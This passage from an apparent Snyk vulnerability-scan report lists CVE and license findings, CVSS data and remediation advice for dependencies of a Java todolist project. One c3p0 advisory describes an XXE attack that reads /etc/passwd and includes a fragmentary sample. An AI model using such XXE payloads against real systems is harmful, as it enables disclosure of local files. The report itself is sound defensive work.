"[5.3.0,5.3.20)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.22.RELEASE", - "5.3.20" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", - "title": "GitHub Commit" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22970", - "title": "Tanzu vmware" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:21.626910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "description": "## 
Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", - "epssDetails": { - "percentile": "0.75300", - "probability": "0.00449", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22970" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-05-12T08:45:35.744127Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-12T08:17:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-05-12T09:49:10.833602Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:48.407397Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "title": "Improper Handling of Case Sensitivity", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.2.21)", - "[5.3.0, 5.3.19)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "5.2.21", - "5.3.19" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-context", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28333", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/MarcinGadz/spring-rce-poc", - "title": "PoC" - }, - { - "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", - "title": "Spring Blog Post" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22968", - "title": "Tanzu Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.233852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.822810Z" - 
}, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", - "epssDetails": { - "percentile": "0.29205", - "probability": "0.00065", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22968" - ], - "CWE": [ - "CWE-178" - ] - }, - "packageName": "org.springframework:spring-context", - "proprietary": false, - "creationTime": "2022-04-14T11:54:10.207823Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-14T11:43:54Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-context" - }, - "publicationTime": 
"2022-04-14T12:09:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:16.458425Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-context", - "version": "3.2.6.RELEASE" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - 
"org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": 
"org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[3.0.1.GA, 3.1.2.GA)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.jboss.logging:jboss-logging", - "creationTime": "2024-06-18T02:47:02.411Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:47:02.411Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.jboss.logging:jboss-logging@3.1.0.CR2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.jboss.logging:jboss-logging", - "version": "3.1.0.CR2" - } - ], - "ok": false, - "dependencyCount": 42, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - 
"severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "99 vulnerable dependency paths", - "remediation": { - "unresolved": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": 
"2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - 
"assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - 
], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": 